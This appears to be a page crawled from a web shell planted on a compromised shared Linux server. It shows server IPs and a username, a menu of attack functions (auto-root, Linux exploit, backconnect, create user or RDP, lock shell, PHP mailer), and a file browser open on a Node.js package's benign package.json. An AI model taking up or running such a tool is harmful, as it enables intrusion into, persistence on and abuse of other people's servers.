Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
electron-to-chromium /
[ HOME SHELL ]
Name
Size
Permission
Action
chromium-versions.js
631
B
-rw-r--r--
chromium-versions.json
486
B
-rw-r--r--
full-chromium-versions.js
30.98
KB
-rw-r--r--
full-chromium-versions.json
25.96
KB
-rw-r--r--
full-versions.js
44.83
KB
-rw-r--r--
full-versions.json
40.97
KB
-rw-r--r--
index.js
1.18
KB
-rw-r--r--
package.json
1012
B
-rw-r--r--
versions.js
1.2
KB
-rw-r--r--
versions.json
963
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "electron-to-chromium", "version": "1.4.71", "description": "Provides a list of electron-to-chromium version mappings", "main": "index.js", "files": [ "versions.js", "full-versions.js", "chromium-versions.js", "full-chromium-versions.js", "versions.json", "full-versions.json", "chromium-versions.json", "full-chromium-versions.json", "LICENSE" ], "scripts": { "build": "node build.js", "update": "node automated-update.js", "test": "nyc ava --verbose", "report": "nyc report --reporter=text-lcov > coverage.lcov && codecov" }, "repository": { "type": "git", "url": "https://github.com/kilian/electron-to-chromium/" }, "keywords": [ "electron", "chrome", "browserlist" ], "author": "Kilian Valkhof", "license": "ISC", "devDependencies": { "ava": "^4.0.1", "codecov": "^3.8.0", "electron-releases": "^3.949.0", "nyc": "^15.1.0", "request": "^2.65.0", "shelljs": "^0.8.4" } }
Close